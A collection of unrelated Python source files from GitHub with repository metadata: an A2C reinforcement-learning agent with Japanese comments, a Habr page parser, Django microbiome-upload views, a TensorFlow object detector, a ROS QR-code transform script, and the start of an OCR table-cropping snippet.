def _backward_loss_actor(self, d_La=1):
#Actorのlossから最初までの一気通貫の誤差逆伝播
##Actorのloss 逆伝播##
#どちらも(N, action_dim)
d_mu, d_log_var = self._loss_actor.backward(d_La)
##Actorのloss 逆伝播 終わり##
##Actorの出力と中間Layersの逆伝播 最初まで##
#(N, state_dim)
d_states = self._backward_output_actor(d_mu, d_log_var)
##Actorの出力と中間Layersの逆伝播 最初まで 終わり##
return d_states
def _forward_loss_critic(self, state, G, weight_decay_lmd):
#Criticのloss
#Gのもとになったstateは、引数stateと同じ並びであること
#分岐以外の、勾配に影響を与える演算はしないこと
##Criticの出力##
#Criticの出力V
#(N, 1),
V = self._forward_output_critic(state, train_flg=True)
##Criticの出力 終わり##
##Criticのloss##
Lc = self._loss_critic.forward(V, G) #Gは教師信号として使用される
##Criticのloss 終わり##
#荷重減衰
if weight_decay_lmd > 0:
sum_all_weights_square = self._sum_all_weights_square(role=1)
Lc = Lc + 0.5*weight_decay_lmd*sum_all_weights_square
#戻り値にVがあるのは、呼び出し元で使うから
return Lc, V
def _backward_loss_critic(self, d_Lc=1):
#Criticのlossから最初までの一気通貫の誤差逆伝播
##Criticのloss 逆伝播##
#(N, 1)
d_V = self._loss_critic.backward(d_Lc)
##Criticのloss 逆伝播# 終わり##
##Criticの出力と中間Layersの逆伝播 最初まで##
#(N, state_dim)
d_states = self._backward_output_critic(d_V)
##Criticの出力と中間Layersの逆伝播 最初まで 終わり##
return d_states
def train(self, episodes, steps_per_episode, gamma=0.99, metrics=1, standardize_G=True, softplus_to_advantage=False,
weight_decay_lmd=0, verbose_interval=100):
start_time = datetime.now()
#エピソード毎の記録list生成
loss_episodes = [] #エピソード毎のlossのlist
loss_actor_episodes = [] #エピソード毎のActorのlossのlist
loss_critic_episodes = [] #エピソード毎のCriticのlossのlist
step_count_episodes = [] #エピソード毎のステップ数のlist
score_episodes = [] #エピソード毎のスコア(Σステップ毎の即時reward)のlist
episode_count = 0
step_count_total = 0
best_step_count = 0 #今までのepisodeの中で最も多いstep回数
best_score = -np.inf #今までのepisodeの中で最も大きいscore
best_metrics_count = 0
#エピソード反復
for ep in range(0, episodes):
#1エピソード
#このエピソード中の全ステップ記録のlist生成
state_steps_episode = []
action_steps_episode = []
reward_steps_episode = []
next_state_steps_episode = []
step_count_ep = 0
score_ep = 0
save_temp_params = False
#環境の開始時点にagentをセット
curr_st = self._env.reset()
#ステップ反復
for st in range(steps_per_episode):
#1ステップ
#ステップ実行
action_predicted = self.predict_best_action(curr_st)
next_st, reward_earned, done, info = self._env.step(action_predicted)
#このエピソード中の全ステップ記録のlistに追加
state_steps_episode.append(curr_st)
action_steps_episode.append(action_predicted)
reward_steps_episode.append(reward_earned)
next_state_steps_episode.append(next_st)
step_count_ep += 1
step_count_total += 1
#ステップ反復終了判定 steps_per_episodeに達したかenvからdone=Trueが返ってきたか
#終了するならbreak
if step_count_ep>=steps_per_episode or done==True:
break
else:
curr_st = next_st
#ステップ反復 for 終わり
#このエピソードのスコア算出
#各ステップの即時報酬の単純合計
score_ep = sum(reward_steps_episode)
#このエピソードの”成績”が過去最高なら、パラメーターを退避
if metrics==0 and (step_count_ep>=best_step_count):
#step countで成績を計測
best_step_count = step_count_ep
best_metrics_count += 1
save_temp_params = True
elif metrics==1 and (score_ep>=best_score):
#scoreで成績を計測
best_score = score_ep
best_metrics_count += 1
save_temp_params = True
if save_temp_params==True:
#パラメーターを一時退避
self._keep_temporarily_all_learnable_params()
#割引報酬和「G」算出
li_G = self._calc_G_of_step_in_an_episode(reward_steps_episode, gamma)
#割引報酬和Gの標準化 引数standardize_Gでやるかやらないか指定される
if standardize_G==True:
Gs = standardize(li_G, with_mean=False).reshape(-1, 1) #平均を0にしない標準化
else:
Gs = np.array(li_G).reshape(-1, 1)
#ActorとCriticのloss算出の順伝播 引数の準備
states = np.array(state_steps_episode)
actions = np.array(action_steps_episode)
#Critic loss算出の順伝播 Actorで使用するVも取得
loss_critic_ep, Vs = self._forward_loss_critic(state=states, G=Gs, weight_decay_lmd=weight_decay_lmd)
#Critic 逆伝播
_ = self._backward_loss_critic(d_Lc=1)
#Critic パラメーター更新
self._update_all_learnable_params(role=1, weight_decay_lmd=weight_decay_lmd)
#Actor loss算出の順伝播
loss_actor_ep = self._forward_loss_actor(state=states, action=actions, G=Gs, V=Vs,
softplus_to_advantage=softplus_to_advantage,
weight_decay_lmd=weight_decay_lmd)
#Actor 逆伝播
_ = self._backward_loss_actor(d_La=1)
#Actor パラメーター更新
self._update_all_learnable_params(role=0, weight_decay_lmd=weight_decay_lmd)
#このエピソードの記録をエピソード毎の記録listに追加
step_count_episodes.append(step_count_ep) #ステップ数
loss_actor_episodes.append(loss_actor_ep) #Actorのloss
loss_critic_episodes.append(loss_critic_ep) #Criticのloss
score_episodes.append(score_ep) #score
if verbose_interval>0 and ( (ep+1)%verbose_interval==0 or ep==0 or (ep+1)==episodes ):
time_string = datetime.now().strftime('%H:%M:%S')
if metrics==0:
best_metrics_string = " best step count:" + str(best_step_count) + "(" + str(best_metrics_count) + "回)"
elif metrics==1:
best_metrics_string = " best score:" + str(best_score) + "(" + str(best_metrics_count) + "回)"
else:
best_metrics_string=""
if save_temp_params==True:
params_saved_string = " ベストなパラメーターを一時退避"
else:
params_saved_string = ""
print("Episode:" + str(ep) + " score:" + str(score_ep) + " step count:" + str(step_count_ep) + \
" loss_actor:" + str(loss_actor_ep) + " loss_critic:" + str(loss_critic_ep) + \
best_metrics_string + params_saved_string + " time:" + time_string)
episode_count += 1
#エピソード反復 for 終わり
#一時退避させてたパラメーターを戻す
self._adopt_all_learnable_params_kept_temporarily()
if verbose_interval>0:
print("一時退避したベストなパラメーターを正式採用")
end_time = datetime.now()
processing_time_total = end_time - start_time #総処理時間 datetime.timedelta
processing_time_total_string = timedelta_HMS_string(processing_time_total) #総処理時間の文字列表現
#resultを生成し、エピソード毎の記録listや引数やらを追加
result = {}
result["name"] = self._name
result["episode_count"] = episode_count
result["loss_actor_episodes"] = loss_actor_episodes
result["loss_critic_episodes"] = loss_critic_episodes
result["step_count_episodes"] = step_count_episodes
result["score_episodes"] = score_episodes
result["step_count_total"] = step_count_total
result["processing_time_total_string"] = processing_time_total_string
result["processing_time_total"] = processing_time_total
#以下引数
result["episodes"] = episodes
result["steps_per_episode"] = steps_per_episode
result["gamma"] = gamma
result["metrics"] = metrics
result["softplus_to_advantage"] = softplus_to_advantage
result["weight_decay_lmd"] = weight_decay_lmd
return result
def _calc_G_of_step_in_an_episode(self, li_reward_in_an_episode, gamma):
#エピソード1個分の記録中の各ステップの割引報酬和Gを計算する。
#li_reward_in_an_episode:エピソード1個分の全ステップのrewardのlist。
#戻り値は、このエピソード1個の中の各ステップのsum_of_discounted_rewardsのlist。listのlenはステップ数。
#※もしExperience Replay方式にする場合、ここは、エピソード1個分の全ステップ記録にGを付加し、そのエピソード1個分の記録を
#経験バッファに追加、となる。
li_G = []
for t, r in enumerate(li_reward_in_an_episode):
li_discounted_rewards_future = \
[r_following * (gamma**t_diff) for t_diff, r_following in enumerate(li_reward_in_an_episode[t:])]
sum_of_discounted_rewards = sum(li_discounted_rewards_future)
li_G.append(sum_of_discounted_rewards)
return li_G
def _update_all_learnable_params(self, role, weight_decay_lmd):
#role:Actor(0)かCritic(1)か
#指定されたroleの全Layersのtrainableなパラメーターを一括更新する。
if role==0:
#Actor
for layer in self._layers_actor.values():
if layer.trainable == True:
layer.update_learnable_params(weight_decay_lmd)
self._out_actor_mu.update_learnable_params(weight_decay_lmd)
self._out_actor_log_var.update_learnable_params(weight_decay_lmd)
elif role==1:
#Critic
for layer in self._layers_critic.values():
if layer.trainable == True:
layer.update_learnable_params(weight_decay_lmd)
def save_params_in_file(self, file_dir, file_name=""):
#このモデルインスタンスのパラメーターをファイル保存する。
if file_name=="":
file_name = self._name + ".pickle"
file_path = file_dir + file_name
#Dictionaryにして保存。keyはlayer.name。
#all_params_dic(Dictionary)
# --learnable layer1の保存したいパラメーターのtuple(weightsのndarray, biasesのndarray)
# --learnable layer2の保存したいパラメーターのtuple(weightsのndarray, biasesのndarray)
# ・
# ・
# --Actor outout layersの保存したいパラメーターのtuple(weightsのndarray, biasesのndarray)
all_params_dic = {}
#Actorのパラメーター分
for layer in self._layers_actor.values():
if layer.trainable == True:
params_tpl = layer.copy_params()
all_params_dic[layer.name] = params_tpl
all_params_dic[self._out_actor_mu.name] = self._out_actor_mu.copy_params()
all_params_dic[self._out_actor_log_var.name] = self._out_actor_log_var.copy_params()
#Criticのパラメーター分
for layer in self._layers_critic.values():
if layer.trainable == True:
params_tpl = layer.copy_params()
all_params_dic[layer.name] = params_tpl
save_pickle_file(all_params_dic, file_path)
return file_name
def overwrite_params_from_file(self, file_path):
#このモデルインスタンスの全パラメーターを、ファイル保存されている別の物に差し替える。
param_layer_tpls_dic = read_pickle_file(file_path)
for layer_name in param_layer_tpls_dic.keys():
#上書きするパラメーターをLayer毎に取り出す
layer_params_tpl = param_layer_tpls_dic[layer_name]
#コピー先Layer毎に上書きする。
#名前が同じLayerがコピー先Layer。
if layer_name in self._layers_actor.keys():
#Actor 中間layers
to_layer = self._layers_actor[layer_name]
if to_layer.trainable==True:
#ltrainableなLayer 上書き
to_layer.overwrite_params(layer_params_tpl)
elif layer_name==self._out_actor_mu.name:
#Actor μ出力layers
self._out_actor_mu.overwrite_params(layer_params_tpl)
elif layer_name==self._out_actor_log_var.name:
#Actor log(var)出力layers
self._out_actor_log_var.overwrite_params(layer_params_tpl)
elif layer_name in self._layers_critic.keys():
#Critic 全layers
to_layer = self._layers_critic[layer_name]
if to_layer.trainable==True:
#ltrainableなLayer 上書き
to_layer.overwrite_params(layer_params_tpl)
def _keep_temporarily_all_learnable_params(self):
#配下の各trainableなLayerに対し、現時点でのlearnableパラメーターの一時退避を指示
#Actor
for layer in self._layers_actor.values():
if layer.trainable == True:
layer.keep_temporarily_learnable_params()
self._out_actor_mu.keep_temporarily_learnable_params()
self._out_actor_log_var.keep_temporarily_learnable_params()
#Critic
for layer in self._layers_critic.values():
if layer.trainable == True:
layer.keep_temporarily_learnable_params()
def _adopt_all_learnable_params_kept_temporarily(self):
#配下の各trainableなLayerに対し、一時退避していたlearnableパラメーターの正式採用を指示
#Actor
for layer in self._layers_actor.values():
if layer.trainable == True:
layer.adopt_learnable_params_kept_temporarily()
self._out_actor_mu.adopt_learnable_params_kept_temporarily()
self._out_actor_log_var.adopt_learnable_params_kept_temporarily()
#Critic
for layer in self._layers_critic.values():
if layer.trainable == True:
layer.adopt_learnable_params_kept_temporarily()
def _sum_all_weights_square(self, role):
#role:Actor(0)かCritic(1)か
#weightを持つtrainableな全Layerと出力layersのweightの2乗の総和を返す。
#荷重減衰(weight decay)のため。
if role==0:
#Actor
sum_of_weights_square = 0
for layer in self._layers_actor.values():
if layer.trainable == True and isinstance(layer, Affine):
sum_of_weights_square += layer.sum_weights_square()
sum_of_weights_square += self._out_actor_mu.sum_weights_square()
sum_of_weights_square += self._out_actor_log_var.sum_weights_square()
elif role==1:
#Critic
sum_of_weights_square = 0
for layer in self._layers_critic.values():
if layer.trainable == True and isinstance(layer, Affine):
sum_of_weights_square += layer.sum_weights_square()
else:
sum_of_weights_square = 0
return sum_of_weights_square
@property
def name(self):
return self._name
@name.setter
def name(self, name):
self._name = name
@property
def env(self):
return self._env
@property
def state_dim(self):
return self._state_dim
@property
def action_dim(self):
return self._action_dim | Atsuo-Shoji/a2c_continuous_no_framework | Planner_separate.py | Planner_separate.py | py | 30,413 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "numpy.ceil",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.int",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "collections.OrderedDict",
"l... |
12646195802 | from html.parser import HTMLParser
from read_site_content import read_site_content
import datetime
import all_id_pages
class HabrPageParser(HTMLParser):
bull_title = False
bull_user = False
bull_hash = False
bull_ul = False
bull_data = False
title=''
user = ''
data = []
hash = []
def handle_starttag(self, tag, attrs):
if tag == 'ul':
for attr in attrs:
if attr[1] == 'post__hubs post__hubs_full-post inline-list':
self.bull_ul=True
if tag == 'a':
for index, attr in enumerate(attrs):
if str(attr[1])[21:25] == 'hub/':
self.hash.append(str(attr[1])[25:])
if str(attr[1]) == 'inline-list__item-link hub-link ':
if str(attrs[index - 1][1])[21:29] == 'company/':
self.hash.append(str(attrs[index - 1][1])[29:])
self.bull_ul = False
if tag == 'span':
for attr in attrs:
if attr[1] == 'post__title-text':
self.bull_title = True
if attr[1] == 'user-info__nickname user-info__nickname_small':
self.bull_user = True
if attr[1] == 'post__time':
self.bull_data = True
def handle_data(self, data):
day=''
month=''
year=''
time=''
if self.bull_title:
self.title = data
self.bull_title = False
if self.bull_user:
self.user = data
self.bull_user = False
if self.bull_hash:
self.hash = data
self.bull_hash = False
if self.bull_data:
split = data.lstrip().split(' ')
all_month = {'января':1, 'февраля':2, 'марта':3, 'апреля':4, 'мая':5, 'июня':6,
'июля':7, 'августа':8, 'сентября':9, 'октября':10, 'ноября':11,'декабря':12,}
if split[0] == 'вчера' or split[0] == 'сегодня':
date = datetime.datetime.today()
yesterday_date = date - datetime.timedelta(days=1)
all_date = {'вчера':yesterday_date.day, 'сегодня':date.day}
day = all_date.get(split[0])
month = date.month
else:
day = split[0]
month = all_month.get(split[1])
time =split[-1].split(':')
if len(split) > 4:
year = split[2]
else:
year = str(datetime.datetime.now()).split('-')[0]
self.data = datetime.datetime(int(year), int(month), int(day), int(time[0]),int(time[1]))
self.bull_data = False
def clean_hash(self):
self.hash = []
id_pages = all_id_pages.all_id_pages[:3]
print('id_pages ', id_pages )
def parse_page(id_pages):
lenn = len(id_pages)
parser = HabrPageParser()
result=[]
for index, id_page in enumerate(id_pages):
print(index,'/',lenn)
link = 'https://habrahabr.ru/post/' + id_page[1]
habr_page = read_site_content(link)
parser.feed(habr_page)
id = id_page[1]
type = id_page [0]
title = parser.title
author = parser.user
hashes = parser.hash
parser.clean_hash()
data = parser.data
result.append([id, type, title, author, data, hashes])
return result
| gugry/FogStreamEdu | lesson8_conclusion_of_SQL/HabrPageParser.py | HabrPageParser.py | py | 3,580 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "html.parser.HTMLParser",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.today",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 68,
"usage_type": "attribute"
},
{
"api_name": "... |
73800489312 | import logging
from concurrent.futures import ThreadPoolExecutor
from time import sleep
from typing import List, Any, Union
from django.core.files.uploadedfile import InMemoryUploadedFile
from app.forms import UploadFilesForm
from app.models import TaxonomyAbundance
from app.util.file_parser import parse_taxonomy_file, FILE_TYPE_TAXONOMY, TaxonomyAbundanceParserResult, \
FILE_TYPE_TAXONOMY_MERGED, parse_taxonomy_merged_file, TaxonomyParserResult
from app.util.helper import Message
# import logging as log
from app.views_admin import *
# Get an instance of a logger
log = logging.getLogger("app")
@login_not_required
def public_index(request):
log.info("public page")
return render(request, 'public/index.html')
def dashboard(request):
return render(request, 'dashboard.html')
# class UploadFilesView(FormView):
# form_class = UploadFilesForm
# template_name = 'upload_files.html'
# success_url = 'upload_files.html'
#
# def post(self, request, *args, **kwargs):
# form_class = self.get_form_class()
# form = self.get_form(form_class)
# files = request.FILES.getlist('files')
# if form.is_valid():
# for f in files:
# ... # Do something with each file.
# return self.form_valid(form)
# else:
# return self.form_invalid(form)
def upload_files(request):
if request.method == 'POST':
log.debug("request.user %s", request.user)
form = UploadFilesForm(request.POST, request.FILES, user=request.user, )
messages = []
if form.is_valid():
# files = form.cleaned_data['files']
files = request.FILES.getlist('files')
file_type = form.cleaned_data['type']
project = form.cleaned_data['project']
if file_type == FILE_TYPE_TAXONOMY:
for f in files:
tax_parse_result = parse_taxonomy_file(f)
messages.extend(handle_one_sample_taxonomy(project, tax_parse_result))
if file_type == FILE_TYPE_TAXONOMY_MERGED:
for f in files:
result: List[TaxonomyParserResult] = parse_taxonomy_merged_file(f)
for tax_parser_result in result:
messages.extend(handle_one_sample_taxonomy(project, tax_parser_result))
form = UploadFilesForm(user=request.user)
return render(request, 'upload_files.html',
{'form': form, 'message': 'Sve ok uneseno u formu', 'messages': messages})
else:
form = UploadFilesForm(user=request.user)
return render(request, 'upload_files.html', {'form': form, 'message': ''})
def handle_one_sample_taxonomy(project: Project, tax_parse_result: TaxonomyParserResult) -> List[str]:
messages = []
sample: Sample = Sample.objects.filter(name=tax_parse_result.sample_name).first()
if sample is not None:
messages.append(f"Exist sample {tax_parse_result.sample_name}, remove prijasnje rezultate")
TaxonomyAbundance.objects.filter(sample=sample).delete()
else:
messages.append(f"Create new sample {tax_parse_result.sample_name} in project {project.name}")
sample = Sample.objects.create(name=tax_parse_result.sample_name, project=project)
sample.save()
tax_parse_result.normalise()
tax: TaxonomyAbundanceParserResult
taxes = []
for tax in tax_parse_result.taxonomy_abundances:
if tax.abundance == 0:
continue
tax = tax.to_model()
tax_int = tax.to_int_model()
tax.sample = sample
taxes.append(tax)
if len(taxes) > 5_000:
log.debug(f"spremam 5 000 njih prvo")
TaxonomyAbundance.objects.bulk_create(taxes)
taxes.clear()
log.debug(f"spremam u bazu ostatak od {len(taxes)} redova za sample {sample.name}, bilo ih je {len(tax_parse_result.taxonomy_abundances)}")
TaxonomyAbundance.objects.bulk_create(taxes)
log.debug(f"gotovo")
messages.append(f"Add {len(taxes)} taxonomy-abundances into db")
return messages
# @permission_required("dsf")
# @login_required
# def projects(request):
# my_projects = Project.objects.filter(user_admins=request.user)
# return render(request, 'projects.html', {"projects": my_projects})
# def projects_new(request):
# if request.method == 'POST':
# form = CreateProjectForm(request.POST)
#
# if form.is_valid():
# new_project: Project = form.save(False)
# new_project.user_creator = request.user
#
# new_project.save()
# new_project.user_admins.add(request.user)
# new_project.save()
# print(form.cleaned_data)
#
# messages.add_message(request, messages.INFO, f"Successfully added project '{new_project.name}'.")
# return HttpResponseRedirect(reverse('projects'))
# else:
# id = request.GET.get('id')
# if id is not None:
# project = get_object_or_404(Project, pk=id)
# # if project.user_admins. != request.user:
# # return HttpResponseForbidden()
# form = CreateProjectForm(instance=project)
# print(project)
# else:
# form = CreateProjectForm()
#
# return render(request, 'projects_new.html', {'form': form})
class ProjectViewMixin(UserPassesTestMixin):
def test_func(self):
pass
# class CheckUserIsProjectAdmin(LoginRequiredMixin):
#
#
# class UserPassesTestMixin(LoginRequiredMixin):
# """Verify that the current user is authenticated."""
#
#
#
# def get_project(self):
#
# def dispatch(self, request, *args, **kwargs):
# return super().dispatch(request, *args, **kwargs)
# LoginRequiredMixin,
class ProjectListView(UserPassesTestMixin, ListView):
model = Project
def get_queryset(self):
u: CustomUser = self.request.user
return Project.objects.filter(member=u)
def test_func(self, **kwargs):
return True
class ProjectCreateView(CreateView):
# Ko si moze raditi projekt? ????
model = Project
form_class = ProjectForm
def form_valid(self, form):
project: Project = form.instance
user: CustomUser = self.request.user
project.created_by = user
form.save()
Membership.objects.create(project=project, user=user, role=UserRole.ADMIN.value)
return super().form_valid(form)
class ProjectDetailView(DetailView):
model = Project
def get_object(self, queryset=None):
project: Project = super(ProjectDetailView, self).get_object(queryset)
if not Membership.is_user_project_member(project, self.request.user):
raise Http404("dont have permission")
return project
class ProjectUpdateView(UpdateView):
model = Project
form_class = ProjectForm
def get_object(self, queryset=None):
p = super(ProjectUpdateView, self).get_object(queryset)
if not Membership.is_user_project_admin(p, self.request.user):
raise Http404(Message.dont_have_permission)
return p
class SampleListView(ListView):
model = Sample
def get_queryset(self):
u: CustomUser = self.request.user
membership = Membership.objects.filter(user=u)
project_ids = []
m: Membership
for m in membership:
project_ids.append(m.project.id)
print("Nasao project ids ", project_ids)
return Sample.objects.filter(project__in=project_ids)
class SampleCreateView(CreateView):
model = Sample
form_class = SampleForm
def get_object(self, queryset=None):
super()
class SampleDetailView(DetailView):
model = Sample
class SampleUpdateView(UpdateView):
model = Sample
form_class = SampleForm
class SampleFilesListView(ListView):
model = SampleFiles
paginate_by = 10
def get_queryset(self):
q = super(SampleFilesListView, self).get_queryset()
q = q.prefetch_related('sample', 'sample__project')
return q
class SampleFilesCreateView(CreateView):
model = SampleFiles
form_class = SampleFilesForm
class SampleFilesDetailView(DetailView):
model = SampleFiles
class SampleFilesUpdateView(UpdateView):
model = SampleFiles
form_class = SampleFilesForm
| jankod/UMCGMicrobiomeWeb | app/views.py | views.py | py | 8,385 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "app.forms.UploadFilesForm",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "app.util.file_parser.FILE_TYPE_TAXONOMY",
"line_number": 57,
"usage_type": "name"
},
{
... |
73698769953 | import logging
from abc import ABC
import tensorflow as tf
from detectors.AbstractDetector import AbstractDetector
from utils.setup_logger import logger
from utils.tensorflow import label_map_util
from utils.util import *
# Create class logger
logger = logging.getLogger('TensorFlowDetector')
class TensorFlowDetector(AbstractDetector, ABC):
def __init__(self):
logger.info('Initializing')
# Load config
self.config = load_config()['object_detection']
self.config_tf = self.config['tensorflow']
# Create empty attribute fields
self.sess = None
self.image_tensor = None
self.detection_boxes = None
self.detection_scores = None
self.detection_classes = None
self.num_detections = None
# Load label map for visualisation
self.category_index = self.load_label_map()
def load_label_map(self):
""" Load the label map.
:return: TensorFlow specific label map
"""
logger.info('Loading label map')
label_map = label_map_util.load_labelmap(self.config_tf['label_map'])
categories = label_map_util.convert_label_map_to_categories(label_map,
max_num_classes=self.config_tf['max_class_id'],
use_display_name=True)
return label_map_util.create_category_index(categories)
def load_model(self):
""" Load the TensorFlow model into memory and get tensor names
"""
logger.info('Loading model')
# Set gpu device for process
os.environ["CUDA_VISIBLE_DEVICES"] = str(self.config['gpu_id'])
# with tf.device('/gpu:{}'.format(self.config['gpu_id'])):
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(self.config_tf['graph_path'], 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# Save session for later access
self.sess = tf.Session(graph=detection_graph)
# Input tensor is the image
self.image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Output tensors are the detection boxes, scores, and classes
# Each box represents a part of the image where a particular object was detected
self.detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represents level of confidence for each of the objects.
# The score is shown on the result image, together with the class label.
self.detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
self.detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
# Number of objects detected
self.num_detections = detection_graph.get_tensor_by_name('num_detections:0')
logger.info('Model loaded')
def detect(self, frames):
""" Runs the detection for one or more frames with the loaded model.
:param frames: loaded and preprocessed frames
:return: (boxes, scores, classes, num)
"""
# Perform the actual detection by running the model with the frame as input
return self.sess.run(
[self.detection_boxes, self.detection_scores, self.detection_classes, self.num_detections],
feed_dict={self.image_tensor: frames})
def visualize(self, frames, detections):
""" Visualize detections in frames
"""
# TODO create
pass
def process_detections(self, results, append_all_detections_dict, append_per_class_dict):
((boxes, scores, classes, num), video_meta) = results
# Get detections above threshold
detections = np.where(scores >= self.config_tf['thresh'])
# Iterate through detections in frames
for frame_i in np.unique(detections[0]).tolist():
# Count objects in scene
objects_in_scene_count = np.where(detections[0] == frame_i)[0].size
# Create empty placeholder
timestamp = 0
class_id = []
score = []
bbox = []
# Iterate objects in scene
for object_i in range(objects_in_scene_count):
# Get object information
timestamp = video_meta['timestamps'][detections[0][object_i]]
class_id.append(int(classes[detections][object_i]))
score.append(scores[detections][object_i])
# Transform relative to absolute values
ymin, xmin, ymax, xmax = boxes[detections][object_i].tolist()
bbox.append({
'ymin': ymin * video_meta['im_height'],
'xmin': xmin * video_meta['im_width'],
'ymax': ymax * video_meta['im_height'],
'xmax': xmax * video_meta['im_width']
})
# Append to all_detections dict
append_all_detections_dict(video_meta['filename'], timestamp, class_id[object_i], score[object_i],
bbox[object_i], object_i + 1, objects_in_scene_count)
# Append to per_class_detections dict
append_per_class_dict(video_meta['filename'], timestamp, class_id, score)
| tdiekel/Video-Object-Detection | detectors/TensorFlowDetector.py | TensorFlowDetector.py | py | 5,547 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "utils.setup_logger.logger",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "detectors.AbstractDetector.AbstractDetector",
"line_number": 15,
"usage_type": "name"
},
... |
26344566280 | #!/usr/bin/env python
import rospy
from tf2_msgs.msg import TFMessage
import tf
from tf.transformations import euler_from_quaternion
from std_msgs.msg import String
from geometry_msgs.msg import PoseStamped
import numpy as np # For random numbers
import tf
import time
import math
import geometry_msgs.msg
class Transformation:
def __init__(self):
self.pose = None
self.code = ''
self.d = []
self.sec = []
self.number_qr = None
rospy.Subscriber('visp_auto_tracker/code_message', String, self._code_cal)
rospy.Subscriber('visp_auto_tracker/object_position', PoseStamped, self._obj_cal)
self.br = tf.TransformBroadcaster()
self.listener = tf.TransformListener() # to get translation & rotations between the frames
self.pr = tf.TransformBroadcaster() # to publish new frames
self.trs = {} # dictionary for storing all info from the qr
# Create callback. This is what happens when a new message is received
def _obj_cal(self, msg):
self.pose = msg.pose
def _code_cal(self, msg):
# import pdb; pdb.set_trace()
self.code = msg.data # to get output from the qr code
if self.code is not '': # split the output & use it afterwards
fir = self.code.split("\r\n")
self.sec = []
for i, e in enumerate(fir):
self.sec.append(e.split("="))
self.number_qr = self.sec[-2][1]
def get_qr_code(self):
if self.code is not '':
now = rospy.Time.now()
self.br.sendTransform([self.pose.position.x, self.pose.position.y, self.pose.position.z],
[self.pose.orientation.x, self.pose.orientation.y, self.pose.orientation.z,
self.pose.orientation.w],
now,
"qr_frame",
"camera_optical_link")
#rospy.sleep(3.)
self.listener.waitForTransform("/map", "/qr_frame", now, rospy.Duration(4.0))
try:
# http://wiki.ros.org/tf/Tutorials/tf%20and%20Time%20%28Python%29
self.listener.waitForTransform("/map", "/qr_frame", now, rospy.Duration(4.0))
(trans1, rot1) = self.listener.lookupTransform('/map', '/qr_frame', now)
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as e:
print(e)
# Use qr_code to map frame translations
self.pr.sendTransform(trans1,
[0.0, 0.0, 0.0, 1.0],
now,
"tr_frame",
"map")
qr_name = 'qr_%d' % float(self.number_qr)
if qr_name not in self.trs:
self.trs[qr_name] = [trans1, float(self.sec[0][1]), float(self.sec[1][1]), float(self.sec[2][1]),
float(self.sec[3][1]),
float(self.sec[4][1]), self.sec[5][1]]
self.d.append(qr_name)
return now
def get_hidden_frame(self, timestamp):
if len(self.trs) == 2: # if you detect two qr codes
# name = trs.keys() #list of keys for the dictionary
qr1_coords_world = self.trs[self.d[0]][0]
qr2_coords_world = self.trs[self.d[1]][0]
qr1_coords_qr = self.trs[self.d[0]][1:3]
qr2_coords_qr = self.trs[self.d[1]][1:3]
world_x = qr2_coords_world[0] - qr1_coords_world[0] # create vector
world_y = qr2_coords_world[1] - qr1_coords_world[1]
distance_w = math.sqrt(world_x ** 2 + world_y ** 2) # Modulus
theta_w = math.acos(world_y / distance_w) # Angle of rotation
if world_x < 0.0: theta_w = 2 * math.pi - theta_w
qr_x = qr2_coords_qr[0] - qr1_coords_qr[0]
qr_y = qr2_coords_qr[1] - qr1_coords_qr[1]
distance_qr = math.sqrt(qr_x ** 2 + qr_y ** 2) # Modulus
theta_qr = math.acos(qr_y / distance_qr) # Angle of rotation
if qr_x < 0.0: theta_qr = 2 * math.pi - theta_qr
final_theta = theta_qr - theta_w # rotation between qr codes frame and map frame
print("Angle between hidden and map frame:", final_theta)
now = timestamp
# to get zero rotation wrt qr codes frame
self.pr.sendTransform([0.0, 0.0, 0.0], tf.transformations.quaternion_from_euler(0.0, 0.0, final_theta),
now,
"rr_frame",
"tr_frame")
#now = rospy.Time.now()
# translate to qr codes frame, Bingo
self.pr.sendTransform([-qr2_coords_qr[0], -qr2_coords_qr[1], 0.0],
tf.transformations.quaternion_from_euler(0.0, 0.0, 0.0),
now,
"qr_pre_frame",
"rr_frame")
# now you need to save wrt something static, because it vanishes after you move
self.listener.waitForTransform("/map", "/qr_pre_frame", timestamp, rospy.Duration(4.))
success = False
try:
#now = rospy.Time.now()
self.listener.waitForTransform('/map', 'qr_pre_frame', now, rospy.Duration(4.0))
(trans2, rot2) = self.listener.lookupTransform('/map', '/qr_pre_frame', now)
success = True
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as e:
print(e)
final_now = rospy.Time.now()
self.pr.sendTransform(trans2, rot2,
final_now,
"qr_coordinate_frame",
"map")
return final_now
| max-27/final_project | scripts/transformations.py | transformations.py | py | 4,762 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "rospy.Subscriber",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "std_msgs.msg.String",
"line_number": 24,
"usage_type": "argument"
},
{
"api_name": "rospy.Subscriber",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "geometry_ms... |
28602910056 | '''
「検査陽性者の状況」画像から注記を抽出する処理 パターン2
'''
import re
import pytesseract
import cv2
import numpy as np
# 画像内の矩形を抽出
# https://stackoverflow.com/a/60068297
def cropTable(src):
hei = src.shape[0]
wid = src.shape[1]
totalArea = wid * hei
original = src.copy()
gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)
